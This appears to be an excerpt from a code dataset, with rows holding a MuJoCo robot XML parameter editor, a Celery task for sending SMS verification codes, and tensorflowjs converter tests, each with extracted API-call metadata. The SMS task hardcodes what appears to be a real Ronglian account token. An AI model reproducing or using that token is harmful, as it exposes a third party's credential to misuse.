body.get_param_names()\n return param_names\n\n def update_params(self, new_params):\n if self.worldbody: assert len(new_params) == self.n_all_params, \"Wrong number of parameters\"\n self.update(new_params[:self.n])\n remaining_params = new_params[self.n:]\n for body in self.parts:\n remaining_params = body.update_params(remaining_params)\n if self.worldbody:\n self.update_initial_position()\n else:\n return remaining_params\n\n def get_body_names(self):\n names = [self.xml.get('name')]\n for body in self.parts:\n names += body.get_names()\n return names\n\n def get_joints(self):\n joints = {}\n for body,pos in zip(self.parts, self.part_positions):\n for j in body.joints:\n joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos)\n joints.update(body.get_joints())\n return joints\n\n def get_volumes(self):\n volumes = {}\n if len(self.joints) > 0:\n for j in self.joints:\n v1 = self.geom.get_volume()\n v2 = sum([b.geom.get_volume() for b in self.parts])\n volumes[j.get('name')] = np.array((v1, v2))\n for body 
in self.parts:\n volumes.update(body.get_volumes())\n return volumes\n\n\nclass MuJoCoXmlRobot:\n def __init__(self, model_xml):\n self.model_xml = model_xml\n self.tree = ET.parse(self.model_xml)\n worldbody = self.tree.getroot().find('worldbody')\n self.body = Body(worldbody.find('body'), worldbody=True)\n\n def get_params(self):\n return self.body.get_params()\n\n def get_param_limits(self):\n return self.body.get_param_limits()\n\n def get_param_names(self):\n return self.body.get_param_names()\n\n def get_height(self):\n return self.body.get_height()\n\n def get_joints(self):\n return self.body.get_joints()\n\n def get_volumes(self):\n return self.body.get_volumes()\n\n def update(self, params, xml_file=None):\n if xml_file is None:\n xml_file = self.model_xml\n self.body.update_params(list(params))\n self.tree.write(xml_file)\n\nif __name__ == '__main__':\n robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')\n params = list(1.0 * np.array(robot.get_params()))\n robot.update(params, 'mujoco_assets/hopper_test.xml')\n assert robot.get_params() == params\n #assert robot.get_height() == 1.31\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml')\n params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06]\n robot.update(params, 'mujoco_assets/walker2d_test.xml')\n assert robot.get_params() == params\n assert robot.get_height() == 1.31\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n robot = MuJoCoXmlRobot('mujoco_assets/ant.xml')\n params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06]\n robot.update(params, 'mujoco_assets/ant_test.xml')\n assert robot.get_params() == params\n assert robot.get_height() == .2\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml')\n params = list(.8 * np.array(robot.get_params()))\n robot.update(params, 'mujoco_assets/humanoid_test.xml')\n assert robot.get_params() == params\n print(robot.get_height())\n #assert robot.get_height() == .6085\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n import gym, roboschool\n env = gym.make(\"RoboschoolHopper-v1\")\n env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml'\n env.reset()\n #env.render()\n import os\n from scipy.misc import imsave\n import subprocess as sp\n outdir = 'xml_vid'\n os.makedirs(outdir, exist_ok=True)\n i = 0\n for _ in range(10):\n env.reset()\n for _ in range(100):\n env.step(env.action_space.sample())\n rgb = env.render('rgb_array')\n imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb)\n i+=1\n sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')])\n env.close()\n"},"apis":{"kind":"list like","value":["xml.etree.ElementTree.parse","os.makedirs","os.path.join","numpy.sum","numpy.array","numpy.concatenate","gym.make"],"string":"[\n \"xml.etree.ElementTree.parse\",\n \"os.makedirs\",\n \"os.path.join\",\n \"numpy.sum\",\n \"numpy.array\",\n \"numpy.concatenate\",\n \"gym.make\"\n]"},"extract_api":{"kind":"string","value":"[((9394, 9425), 'gym.make', 'gym.make', (['\"\"\"RoboschoolHopper-v1\"\"\"'], {}), \"('RoboschoolHopper-v1')\\n\", (9402, 9425), False, 'import gym, roboschool\\n'), ((9625, 9659), 'os.makedirs', 'os.makedirs', (['outdir'], {'exist_ok': '(True)'}), '(outdir, exist_ok=True)\\n', (9636, 9659), False, 'import os\\n'), ((1671, 1691), 
'numpy.array', 'np.array', (['fromto[:3]'], {}), '(fromto[:3])\\n', (1679, 1691), True, 'import numpy as np\\n'), ((1710, 1730), 'numpy.array', 'np.array', (['fromto[3:]'], {}), '(fromto[3:])\\n', (1718, 1730), True, 'import numpy as np\\n'), ((7208, 7232), 'xml.etree.ElementTree.parse', 'ET.parse', (['self.model_xml'], {}), '(self.model_xml)\\n', (7216, 7232), True, 'import xml.etree.ElementTree as ET\\n'), ((1756, 1788), 'numpy.sum', 'np.sum', (['((self.p2 - self.p1) ** 2)'], {}), '((self.p2 - self.p1) ** 2)\\n', (1762, 1788), True, 'import numpy as np\\n'), ((9977, 10009), 'os.path.join', 'os.path.join', (['outdir', '\"\"\"%05d.png\"\"\"'], {}), \"(outdir, '%05d.png')\\n\", (9989, 10009), False, 'import os\\n'), ((10056, 10087), 'os.path.join', 'os.path.join', (['outdir', '\"\"\"out.mp4\"\"\"'], {}), \"(outdir, 'out.mp4')\\n\", (10068, 10087), False, 'import os\\n'), ((6973, 6991), 'numpy.array', 'np.array', (['(v1, v2)'], {}), '((v1, v2))\\n', (6981, 6991), True, 'import numpy as np\\n'), ((2228, 2262), 'numpy.concatenate', 'np.concatenate', (['[self.p1, self.p2]'], {}), '([self.p1, self.p2])\\n', (2242, 2262), True, 'import numpy as np\\n')]"}}},{"rowIdx":732,"cells":{"code":{"kind":"string","value":"from ronglian_sms_sdk import SmsSDK\nfrom celery_tasks.main import app\n# 写我们的任务(函数)\n# 任务必须要celery的实例对象装饰器task装饰\n# 任务包的任务需要celery调用自检检查函数。(在main里面写。)\n\n@app.task\ndef celery_send_sms_code(mobile, sms_code):\n accId = ''\n accToken = '514a8783b8c2481ebbeb6a814434796f'\n appId = ''\n\n # 9.1. 创建荣联云 实例对象\n sdk = SmsSDK(accId, accToken, appId)\n tid = '1' # 我们发送短信的模板,值 只能是 1 因为我们是测试用户\n mobile = '%s' % mobile # '手机号1,手机号2' 给哪些手机号发送验证码,只能是测试手机号\n datas = (sms_code, 10) # ('变量1', '变量2') 涉及到模板的变量\n # 您的验证码为{1},请于{2} 分钟内输入\n # 您的验证码为666999,请于5 分钟内输入\n # 9.2. 
发送短信\n sdk.sendMessage(tid, mobile, datas)"},"apis":{"kind":"list like","value":["ronglian_sms_sdk.SmsSDK"],"string":"[\n \"ronglian_sms_sdk.SmsSDK\"\n]"},"extract_api":{"kind":"string","value":"[((326, 356), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', (['accId', 'accToken', 'appId'], {}), '(accId, accToken, appId)\\n', (332, 356), False, 'from ronglian_sms_sdk import SmsSDK\\n')]"}}},{"rowIdx":733,"cells":{"code":{"kind":"string","value":"# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Test the Python API and shell binary of the tensorflowjs pip package.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport glob\nimport json\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport unittest\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.eager import def_function\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_spec\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.training.tracking import tracking\nfrom tensorflow.python.saved_model.save import save\nimport tensorflow_hub as hub\n\nimport tensorflowjs as tfjs\n\n\ndef _createKerasModel(layer_name_prefix, h5_path=None):\n \"\"\"Create a Keras model for testing.\n\n Args:\n layer_name_prefix: A prefix string for layer names. This helps avoid\n clashes in layer names between different test methods.\n h5_path: Optional string path for a HDF5 (.h5) file to save the model\n in.\n\n Returns:\n An instance of keras.Model.\n \"\"\"\n input_tensor = keras.layers.Input((3, ))\n dense1 = keras.layers.Dense(\n 4,\n use_bias=True,\n kernel_initializer='ones',\n bias_initializer='zeros',\n name=layer_name_prefix + '1')(input_tensor)\n output = keras.layers.Dense(\n 2,\n use_bias=False,\n kernel_initializer='ones',\n name=layer_name_prefix + '2')(dense1)\n model = keras.models.Model(inputs=[input_tensor], outputs=[output])\n if h5_path:\n model.save(h5_path)\n return model\n\ndef _createTensorFlowSavedModelV1(name_scope, save_path):\n \"\"\"Create a TensorFlow SavedModel for testing.\n Args:\n name_scope: Name scope to create the model under. 
This helps avoid\n op and variable name clashes between different test methods.\n save_path: The directory path in which to save the model.\n \"\"\"\n graph = tf.Graph()\n with graph.as_default():\n with tf.compat.v1.name_scope(name_scope):\n x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])\n w = tf.compat.v1.get_variable('w', shape=[2, 2])\n y = tf.compat.v1.matmul(x, w)\n output = tf.compat.v1.nn.softmax(y)\n init_op = w.initializer\n\n # Create a builder.\n builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path)\n\n with tf.compat.v1.Session() as sess:\n # Run the initializer on `w`.\n sess.run(init_op)\n\n builder.add_meta_graph_and_variables(\n sess, [tf.compat.v1.saved_model.tag_constants.SERVING],\n signature_def_map={\n \"serving_default\":\n tf.compat.v1.saved_model.signature_def_utils.predict_signature_def(\n inputs={\"x\": x},\n outputs={\"output\": output})\n },\n assets_collection=None)\n\n builder.save()\n\ndef _createTensorFlowSavedModel(name_scope, save_path):\n \"\"\"Create a TensorFlow SavedModel for testing.\n\n Args:\n name_scope: Name scope to create the model under. This helps avoid\n op and variable name clashes between different test methods.\n save_path: The directory path in which to save the model.\n \"\"\"\n\n input_data = constant_op.constant(1., shape=[1])\n root = tracking.AutoTrackable()\n root.v1 = variables.Variable(3.)\n root.v2 = variables.Variable(2.)\n root.f = def_function.function(lambda x: root.v1 * root.v2 * x)\n to_save = root.f.get_concrete_function(input_data)\n\n save(root, save_path, to_save)\n\n\ndef _create_hub_module(save_path):\n \"\"\"Create a TensorFlow Hub module for testing.\n\n Args:\n save_path: The directory path in which to save the model.\n \"\"\"\n # Module function that doubles its input.\n def double_module_fn():\n w = tf.Variable([2.0, 4.0])\n x = tf.compat.v1.placeholder(dtype=tf.float32)\n hub.add_signature(inputs=x, outputs=x*w)\n graph = tf.Graph()\n with graph.as_default():\n spec = hub.create_module_spec(double_module_fn)\n m = hub.Module(spec)\n # Export the module.\n with tf.compat.v1.Session(graph=graph) as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n m.export(save_path, sess)\n\nclass APIAndShellTest(tf.test.TestCase):\n \"\"\"Tests for the Python API of the pip package.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.class_tmp_dir = tempfile.mkdtemp()\n cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model')\n cls.tf_saved_model_v1_dir = os.path.join(\n cls.class_tmp_dir, 'tf_saved_model_v1')\n _createTensorFlowSavedModel('a', cls.tf_saved_model_dir)\n _createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir)\n cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module')\n _create_hub_module(cls.tf_hub_module_dir)\n\n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls.class_tmp_dir)\n\n def setUp(self):\n # Make sure this file is not being run from the source directory, to\n # avoid picking up source files.\n if os.path.isdir(\n os.path.join(os.path.dirname(__file__), 'tensorflowjs')):\n self.fail('Do not run this test from the Python source directory. 
'\n 'This file is intended to be run on pip install.')\n\n self._tmp_dir = tempfile.mkdtemp()\n super(APIAndShellTest, self).setUp()\n\n def tearDown(self):\n if os.path.isdir(self._tmp_dir):\n shutil.rmtree(self._tmp_dir)\n super(APIAndShellTest, self).tearDown()\n\n def testVersionString(self):\n self.assertEqual(2, tfjs.__version__.count('.'))\n\n def testSaveKerasModel(self):\n with self.test_session():\n # First create a toy keras model.\n model = _createKerasModel('MergedDense')\n\n tfjs.converters.save_keras_model(model, self._tmp_dir)\n\n # Briefly check the model topology.\n with open(os.path.join(self._tmp_dir, 'model.json')) as f:\n json_content = json.load(f)\n model_json = json_content['modelTopology']\n self.assertIsInstance(model_json['model_config'], dict)\n self.assertIsInstance(model_json['model_config']['config'], dict)\n self.assertIn('layers', model_json['model_config']['config'])\n\n weights_manifest = json_content['weightsManifest']\n self.assertIsInstance(weights_manifest, list)\n\n # Briefly check the weights manifest.\n weight_shapes = dict()\n weight_dtypes = dict()\n for manifest_item in weights_manifest:\n for weight in manifest_item['weights']:\n weight_name = weight['name']\n weight_shapes[weight_name] = weight['shape']\n weight_dtypes[weight_name] = weight['dtype']\n\n self.assertEqual(\n sorted(list(weight_shapes.keys())),\n sorted([\n 'MergedDense1/kernel', 'MergedDense1/bias',\n 'MergedDense2/kernel'\n ]))\n self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4])\n self.assertEqual(weight_shapes['MergedDense1/bias'], [4])\n self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2])\n self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32')\n self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32')\n self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32')\n\n def testLoadKerasModel(self):\n # Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision.\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # First create a toy keras model.\n model1 = _createKerasModel('MergedDense')\n tfjs.converters.save_keras_model(model1, self._tmp_dir)\n model1_weight_values = model1.get_weights()\n\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # Load the model from saved artifacts.\n model2 = tfjs.converters.load_keras_model(\n os.path.join(self._tmp_dir, 'model.json'))\n\n # Compare the loaded model with the original one.\n model2_weight_values = model2.get_weights()\n self.assertEqual(len(model1_weight_values), len(model2_weight_values))\n for model1_weight_value, model2_weight_value in zip(\n model1_weight_values, model2_weight_values):\n self.assertAllClose(model1_weight_value, model2_weight_value)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*')))\n\n def testInvalidInputFormatRaisesError(self):\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter', '--input_format',\n 'nonsensical_format', self._tmp_dir, self._tmp_dir\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertGreater(process.returncode, 0)\n self.assertIn(b'--input_format', tf.compat.as_bytes(stderr))\n\n def testMissingInputPathRaisesError(self):\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter'\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertGreater(process.returncode, 0)\n self.assertIn(b'input_path', tf.compat.as_bytes(stderr))\n\n 
def testKerasH5ConversionWorksFromCLI(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # First create a toy keras model.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n _createKerasModel('MergedDenseForCLI', h5_path)\n\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras', h5_path,\n self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # Briefly check the model topology.\n with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:\n json_content = json.load(f)\n model_json = json_content['modelTopology']\n self.assertIsInstance(model_json['model_config'], dict)\n self.assertIsInstance(model_json['model_config']['config'], dict)\n self.assertIn('layers', model_json['model_config']['config'])\n\n weights_manifest = json_content['weightsManifest']\n self.assertIsInstance(weights_manifest, list)\n\n # Briefly check the weights manifest.\n weight_shapes = dict()\n weight_dtypes = dict()\n for manifest_item in weights_manifest:\n for weight in manifest_item['weights']:\n weight_name = weight['name']\n weight_shapes[weight_name] = weight['shape']\n weight_dtypes[weight_name] = weight['dtype']\n\n self.assertEqual(\n sorted(list(weight_shapes.keys())),\n sorted([\n 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',\n 'MergedDenseForCLI2/kernel'\n ]))\n self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])\n self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])\n self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')\n\n # Verify that there is only one weight group due to the default\n # non-split_weights_by_layer behavior. The model is a small one, which\n # does not exceed the 4-MB shard size limit. 
Therefore, there should\n # be only one weight file.\n self.assertEqual(\n 1, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))\n\n def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # First create a toy keras model.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n _createKerasModel('MergedDenseForCLI', h5_path)\n\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # Briefly check the model topology.\n with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:\n json_content = json.load(f)\n model_json = json_content['modelTopology']\n self.assertIsInstance(model_json['model_config'], dict)\n self.assertIsInstance(model_json['model_config']['config'], dict)\n self.assertIn('layers', model_json['model_config']['config'])\n\n weights_manifest = json_content['weightsManifest']\n self.assertIsInstance(weights_manifest, list)\n\n # Briefly check the weights manifest.\n weight_shapes = dict()\n weight_dtypes = dict()\n for manifest_item in weights_manifest:\n for weight in manifest_item['weights']:\n weight_name = weight['name']\n weight_shapes[weight_name] = weight['shape']\n weight_dtypes[weight_name] = weight['dtype']\n\n self.assertEqual(\n sorted(list(weight_shapes.keys())),\n sorted([\n 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',\n 'MergedDenseForCLI2/kernel'\n ]))\n self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])\n self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])\n self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')\n\n # Verify that there are two weight groups due to the optional flag\n # --split_weights_by_layer behavior. The model is a small one. 
None of\n # the layers should have weight sizes exceeding the 4-MB shard size\n # limit.\n self.assertEqual(\n 2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))\n\n def testKerasH5ConversionWithSignatureNameErrors(self):\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter', '--input_format', 'keras',\n '--signature_name', 'bar',\n os.path.join(self._tmp_dir, 'foo.h5'),\n os.path.join(self._tmp_dir, 'output')\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertGreater(process.returncode, 0)\n self.assertIn(\n b'The --signature_name flag is applicable only to',\n tf.compat.as_bytes(stderr))\n\n def testConvertTFSavedModelV1WithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model',\n self.tf_saved_model_v1_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}]\n\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n self.assertEqual(output_json['weightsManifest'], weights)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n\n def testConvertTFHubModuleWithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{\n 'shape': [2],\n 'name': 'module/Variable',\n 'dtype': 'float32'\n }]\n }]\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n self.assertEqual(output_json['weightsManifest'], weights)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n def testConvertTFSavedModelWithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model',\n self.tf_saved_model_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{\n 'dtype': 'float32',\n 'shape': [],\n 'name': 'StatefulPartitionedCall/mul'\n }]\n }]\n\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n weights_manifest = output_json['weightsManifest']\n self.assertEqual(len(weights_manifest), len(weights))\n if sys.version_info[0] < 3:\n self.assertItemsEqual(weights_manifest[0]['paths'],\n weights[0]['paths'])\n self.assertItemsEqual(weights_manifest[0]['weights'],\n weights[0]['weights'])\n else:\n self.assertCountEqual(weights_manifest[0]['paths'],\n weights[0]['paths'])\n self.assertCountEqual(weights_manifest[0]['weights'],\n weights[0]['weights'])\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n def testConvertTFHubModuleWithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 
'tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{\n 'shape': [2],\n 'name': 'module/Variable',\n 'dtype': 'float32'\n }]\n }]\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n self.assertEqual(output_json['weightsManifest'], weights)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n def testConvertTensorflowjsArtifactsToKerasH5(self):\n # 1. Create a toy keras model and save it as an HDF5 file.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model = _createKerasModel('MergedDenseForCLI', h5_path)\n model_json = model.to_json()\n\n # 2. Convert the HDF5 file to tensorflowjs format.\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras', h5_path,\n self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tensorflowjs artifacts back to HDF5.\n new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras',\n os.path.join(self._tmp_dir, 'model.json'), new_h5_path])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Load the model back from the new HDF5 file and compare with the\n # original model.\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model_2 = keras.models.load_model(new_h5_path)\n model_2_json = model_2.to_json()\n self.assertEqual(model_json, model_2_json)\n\n def testLoadTensorflowjsArtifactsAsKerasModel(self):\n # 1. Create a toy keras model and save it as an HDF5 file.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model = _createKerasModel('MergedDenseForCLI', h5_path)\n model_json = model.to_json()\n\n # 2. Convert the HDF5 file to tensorflowjs format.\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras', h5_path,\n self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. 
Load the tensorflowjs artifacts as a keras.Model instance.\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model_2 = tfjs.converters.load_keras_model(\n os.path.join(self._tmp_dir, 'model.json'))\n model_2_json = model_2.to_json()\n self.assertEqual(model_json, model_2_json)\n\n def testVersion(self):\n process = subprocess.Popen(\n ['tensorflowjs_converter', '--version'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, _ = process.communicate()\n self.assertEqual(0, process.returncode)\n self.assertIn(\n tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),\n tf.compat.as_bytes(stdout))\n\n process = subprocess.Popen(\n ['tensorflowjs_converter', '-v'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n stdout, _ = process.communicate()\n self.assertEqual(0, process.returncode)\n self.assertIn(\n tf.compat.as_bytes('tensorflowjs %s' % tfjs.__version__),\n tf.compat.as_bytes(stdout))\n\n\nclass ConvertTfKerasSavedModelTest(tf.test.TestCase):\n\n def setUp(self):\n super(ConvertTfKerasSavedModelTest, self).setUp()\n self._tmp_dir = tempfile.mkdtemp()\n\n def tearDown(self):\n if os.path.isdir(self._tmp_dir):\n shutil.rmtree(self._tmp_dir)\n super(ConvertTfKerasSavedModelTest, self).tearDown()\n\n def _createSimpleSequentialModel(self):\n model = keras.Sequential()\n model.add(keras.layers.Reshape([2, 3], input_shape=[6]))\n model.add(keras.layers.LSTM(10))\n model.add(keras.layers.Dense(1, activation='sigmoid'))\n return model\n\n def _createNestedSequentialModel(self):\n model = keras.Sequential()\n model.add(keras.layers.Dense(6, input_shape=[10], activation='relu'))\n model.add(self._createSimpleSequentialModel())\n return model\n\n def _createFunctionalModelWithWeights(self):\n input1 = keras.Input(shape=[8])\n input2 = keras.Input(shape=[10])\n y = keras.layers.Concatenate()([input1, input2])\n y = keras.layers.Dense(4, activation='softmax')(y)\n model = keras.Model([input1, input2], y)\n return model\n\n def testConvertTfKerasNestedSequentialSavedModelIntoTfjsFormat(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x = np.random.randn(8, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createNestedSequentialModel()\n y = model.predict(x)\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Implicit value of --output_format: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n model_json_path = os.path.join(tfjs_output_dir, 'model.json')\n self.assertTrue(os.path.isfile(model_json_path))\n\n # 3. Convert the tfjs model to keras h5 format.\n new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n self.assertTrue(os.path.isfile(new_h5_path))\n\n # 4. 
Load the model back and assert on the equality of the predict\n # results.\n model_prime = keras.models.load_model(new_h5_path)\n new_y = model_prime.predict(x)\n self.assertAllClose(y, new_y)\n\n def testConvertTfKerasFunctionalSavedModelIntoTfjsFormat(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n x1 = np.random.randn(4, 8)\n x2 = np.random.randn(4, 10)\n\n # 1. Run the model.predict(), store the result. Then saved the model\n # as a SavedModel.\n model = self._createFunctionalModelWithWeights()\n y = model.predict([x1, x2])\n\n keras.experimental.export_saved_model(model, self._tmp_dir)\n\n # 2. Convert the keras saved model to tfjs format.\n tfjs_output_dir = os.path.join(self._tmp_dir, 'tfjs')\n # Use explicit --output_format value: tfjs_layers_model\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras_saved_model',\n '--output_format', 'tfjs_layers_model',\n self._tmp_dir, tfjs_output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n model_json_path = os.path.join(tfjs_output_dir, 'model.json')\n self.assertTrue(os.path.isfile(model_json_path))\n\n # 3. Convert the tfjs model to keras h5 format.\n new_h5_path = os.path.join(self._tmp_dir, 'new_h5.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras', model_json_path, new_h5_path])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n 